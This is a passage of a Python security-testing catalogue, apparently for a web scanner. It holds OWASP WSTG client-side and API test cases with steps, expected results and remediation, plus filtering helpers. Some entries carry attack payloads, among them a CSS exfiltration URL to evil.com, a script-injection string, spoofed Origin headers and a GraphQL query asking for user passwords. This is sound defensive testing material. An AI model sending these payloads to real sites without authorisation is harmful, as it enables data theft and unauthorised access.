     "objective":"Test for CSS injection vulnerabilities","applies_when":["has_forms"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test CSS context injection: } body{background:red}",
                      "Test CSS exfiltration via selectors","Test in theme/style settings"],
     "payloads":["}body{background:url('https://evil.com/'}","</style><script>alert(1)</script>"],
     "expected_vulnerable":"CSS injection alters page appearance or exfiltrates data",
     "expected_safe":"CSS input properly escaped","remediation":"Escape CSS special characters",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-06","category":"Client-Side Testing","name":"Test Client-Side Resource Manipulation",
     "objective":"Test manipulation of client-side resources","applies_when":["always"],
     "severity":"medium","owasp_top10":["A08:2021"],"burp_applicable":False,
     "manual_steps":["Check if JS libraries loaded from CDN",
                      "Test Subresource Integrity (SRI) on CDN resources",
                      "Check for CDN hijacking possibilities"],
     "payloads":[],"expected_vulnerable":"CDN resources without SRI, open to hijacking",
     "expected_safe":"SRI hashes on all CDN resources","remediation":"Add integrity= attribute to all CDN links",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-07","category":"Client-Side Testing","name":"Test Cross-Origin Resource Sharing",
     "objective":"Test CORS misconfiguration","applies_when":["has_api","always"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Send: Origin: https://evil.com and check CORS headers in response",
                      "Test: Origin: null (for CORS bypass via sandboxed iframe)",
                      "Check Access-Control-Allow-Origin: *",
                      "Check Access-Control-Allow-Credentials: true with wildcard origin",
                      "Test preflight requests: OPTIONS with Origin header"],
     "payloads":["Origin: https://evil.com","Origin: null","Origin: https://TARGET.evil.com"],
     "expected_vulnerable":"Access-Control-Allow-Origin mirrors evil.com + Credentials: true",
     "expected_safe":"CORS restricted to specific trusted origins",
     "remediation":"Validate Origin against allowlist, never use wildcard with credentials",
     "h1_pattern_ids":["cors_misconfig"]},

    {"id":"WSTG-CLNT-08","category":"Client-Side Testing","name":"Test Cross-Site Flashing",
     "objective":"Test Flash-based cross-origin vulnerabilities","applies_when":["always"],
     "severity":"low","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Check for Flash content (mostly legacy)","Test crossdomain.xml if Flash present"],
     "payloads":[],"expected_vulnerable":"Flash present with permissive crossdomain.xml",
     "expected_safe":"No Flash, or restrictive policy","remediation":"Remove Flash entirely",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-09","category":"Client-Side Testing","name":"Test Clickjacking",
     "objective":"Test for clickjacking vulnerabilities","applies_when":["always"],
     "severity":"medium","owasp_top10":["A05:2021"],"burp_applicable":True,
     "manual_steps":["Check X-Frame-Options header","Check CSP frame-ancestors directive",
                      "Try embedding page in iframe: <iframe src='TARGET'>",
                      "Test sensitive actions for clickjacking risk"],
     "payloads":['<iframe src="TARGET" width="800" height="600"></iframe>'],
     "expected_vulnerable":"Page can be embedded in iframe without restriction",
     "expected_safe":"X-Frame-Options: DENY or CSP frame-ancestors: 'none'",
     "remediation":"Add X-Frame-Options: DENY and CSP frame-ancestors: 'none'",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-10","category":"Client-Side Testing","name":"Test WebSockets",
     "objective":"Test WebSocket security","applies_when":["always"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Intercept WebSocket handshake in Burp","Test for CSWSH (Cross-Site WebSocket Hijacking)",
                      "Test if authentication checked on WebSocket messages",
                      "Test injection in WebSocket messages","Check for wss:// (not ws://)"],
     "payloads":['{"type":"admin","action":"getUsers"}','{"userId":"OTHER_USER_ID"}'],
     "expected_vulnerable":"CSWSH possible, no auth on WS messages",
     "expected_safe":"Origin checked on WS handshake, auth on every message",
     "remediation":"Validate Origin on WS handshake, authenticate each message",
     "h1_pattern_ids":["websocket_issues"]},

    {"id":"WSTG-CLNT-11","category":"Client-Side Testing","name":"Test Web Messaging",
     "objective":"Test postMessage security","applies_when":["always"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":False,
     "manual_steps":["Check JS for addEventListener('message', ...) handlers",
                      "Test if origin is validated: if (event.origin !== 'trusted')",
                      "Send postMessage from external origin",
                      "Test for XSS via postMessage"],
     "payloads":[],"expected_vulnerable":"postMessage handler processes messages from any origin",
     "expected_safe":"Origin validated before processing postMessage",
     "remediation":"Always validate event.origin in message handlers","h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-12","category":"Client-Side Testing","name":"Test Browser Storage",
     "objective":"Test browser storage for sensitive data","applies_when":["always"],
     "severity":"medium","owasp_top10":["A02:2021"],"burp_applicable":False,
     "manual_steps":["Check localStorage for sensitive data: localStorage.getItem(key)",
                      "Check sessionStorage","Check IndexedDB","Check sensitive data in cookies",
                      "Look for tokens, PII, credentials in browser storage"],
     "payloads":[],"expected_vulnerable":"Tokens/credentials in localStorage (accessible to XSS)",
     "expected_safe":"Only non-sensitive data in localStorage, tokens in HttpOnly cookies",
     "remediation":"Store tokens in HttpOnly cookies, not localStorage","h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-13","category":"Client-Side Testing","name":"Test Cross-Site Script Inclusion",
     "objective":"Test for XSSI vulnerabilities","applies_when":["has_api","has_login"],
     "severity":"medium","owasp_top10":["A03:2021"],"burp_applicable":True,
     "manual_steps":["Test if JSON APIs accessible cross-origin via <script src=>",
                      "Check if JSON responses start with [ (array) — XSSI risk",
                      "Test for JSON hijacking with old browsers"],
     "payloads":[],"expected_vulnerable":"JSON array data readable cross-origin",
     "expected_safe":"JSON prefixed with )]}'\\n or requires authentication",
     "remediation":"Prefix JSON responses with )]}', require proper headers",
     "h1_pattern_ids":[]},

    {"id":"WSTG-CLNT-14","category":"Client-Side Testing","name":"Test Reverse Tabnapping",
     "objective":"Test for reverse tabnapping via target=_blank",
     "applies_when":["always"],"severity":"low","owasp_top10":[],"burp_applicable":False,
     "manual_steps":["Find all target='_blank' links","Check for rel='noopener noreferrer'",
                      "Test: malicious site can modify opener.location"],
     "payloads":[],"expected_vulnerable":"target=_blank without noopener",
     "expected_safe":"All external links have rel='noopener noreferrer'",
     "remediation":"Add rel='noopener noreferrer' to all target=_blank links","h1_pattern_ids":[]},

    # ═══════════════════════════════════════════════════
    # API TESTING (WSTG-APIT)
    # ═══════════════════════════════════════════════════
    {"id":"WSTG-APIT-01","category":"API Testing","name":"Test GraphQL",
     "objective":"Test GraphQL API security","applies_when":["has_api"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Test introspection: {__schema{types{name}}}",
                      "Test for unauthorized queries/mutations",
                      "Test batch queries (DoS via deeply nested queries)",
                      "Test for IDOR in GraphQL","Test mutations for privilege escalation"],
     "payloads":['{"query":"{__schema{types{name}}}"}',
                 '{"query":"{__typename}"}',
                 '{"query":"query{users{id email password}}"}'],
     "expected_vulnerable":"Introspection enabled, sensitive data accessible",
     "expected_safe":"Introspection disabled in production, proper auth on all resolvers",
     "remediation":"Disable introspection, implement per-resolver auth","h1_pattern_ids":["graphql_issues"]},

    {"id":"WSTG-APIT-02","category":"API Testing","name":"Test REST API",
     "objective":"Test REST API security comprehensively","applies_when":["has_api","always"],
     "severity":"high","owasp_top10":["A01:2021"],"burp_applicable":True,
     "manual_steps":["Test all CRUD operations on all endpoints",
                      "Test IDOR on all resource IDs",
                      "Test missing function-level auth (admin APIs accessible to users)",
                      "Test mass assignment via additional JSON fields",
                      "Test for sensitive data in responses (filter unnecessary fields)"],
     "payloads":['{"role":"admin","is_admin":true}'],
     "expected_vulnerable":"Unauthorized access to resources or admin functions",
     "expected_safe":"All endpoints properly authenticated and authorized",
     "remediation":"Implement auth check on every endpoint, use allowlist for response fields",
     "h1_pattern_ids":["idor_numeric_id","mass_assignment"]},

    {"id":"WSTG-APIT-03","category":"API Testing","name":"Test APIs for Common Security Issues",
     "objective":"Test APIs for OWASP API Top 10 vulnerabilities",
     "applies_when":["has_api","always"],"severity":"high","owasp_top10":["A01:2021"],
     "burp_applicable":True,
     "manual_steps":["Test for Broken Object Level Auth (BOLA/IDOR)",
                      "Test for Broken User Auth (no token required)",
                      "Test for Excessive Data Exposure (more fields than needed)",
                      "Test for Lack of Resources & Rate Limiting",
                      "Test for Security Misconfiguration (debug mode, verbose errors)",
                      "Test for Injection in API params"],
     "payloads":[],"expected_vulnerable":"Any OWASP API Top 10 issue found",
     "expected_safe":"All API endpoints properly secured",
     "remediation":"Follow OWASP API Security Top 10 guidelines","h1_pattern_ids":["idor_numeric_id"]},
]


def get_all_tests() -> list:
    """Return all WSTG test cases."""
    return WSTG_TESTS


def get_applicable_tests(crawl_result: dict) -> list:
    """
    Filter tests based on what crawler found.
    Returns sorted list: Critical → High → Medium → Low → Info
    """
    has_login = bool(crawl_result.get("auth_endpoints") or
                     any(f.get("has_password") for f in crawl_result.get("forms", [])))
    has_forms = bool(crawl_result.get("forms"))
    has_file_upload = bool(crawl_result.get("file_upload_points"))
    has_api = bool(crawl_result.get("api_endpoints"))
    tech_list = [t.lower() for t in crawl_result.get("technologies", [])]
    php_detected = "php" in tech_list

    conditions = {
        "always": True,
        "has_login": has_login,
        "has_forms": has_forms,
        "has_file_upload": has_file_upload,
        "has_api": has_api,
        "php_detected": php_detected,
    }

    applicable = []
    for test in WSTG_TESTS:
        applies = test.get("applies_when", ["always"])
        if any(conditions.get(c, False) for c in applies):
            applicable.append(test)

    # Sort by severity
    sev_order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
    applicable.sort(key=lambda t: sev_order.get(t.get("severity", "info"), 5))
    return applicable


def get_test_by_id(test_id: str) -> dict:
    """Get a specific test by WSTG ID."""
    for t in WSTG_TESTS:
        if t["id"] == test_id:
            return t
    return {}


def get_tests_by_category(category: str) -> list:
    """Get all tests in a category."""
    return [t for t in WSTG_TESTS if t["category"] == category]


def get_category_summary() -> dict:
    """Return count per category."""
    cats = {}
    for t in WSTG_TESTS:
        c = t["category"]
        cats[c] = cats.get(c, 0) + 1
    return cats
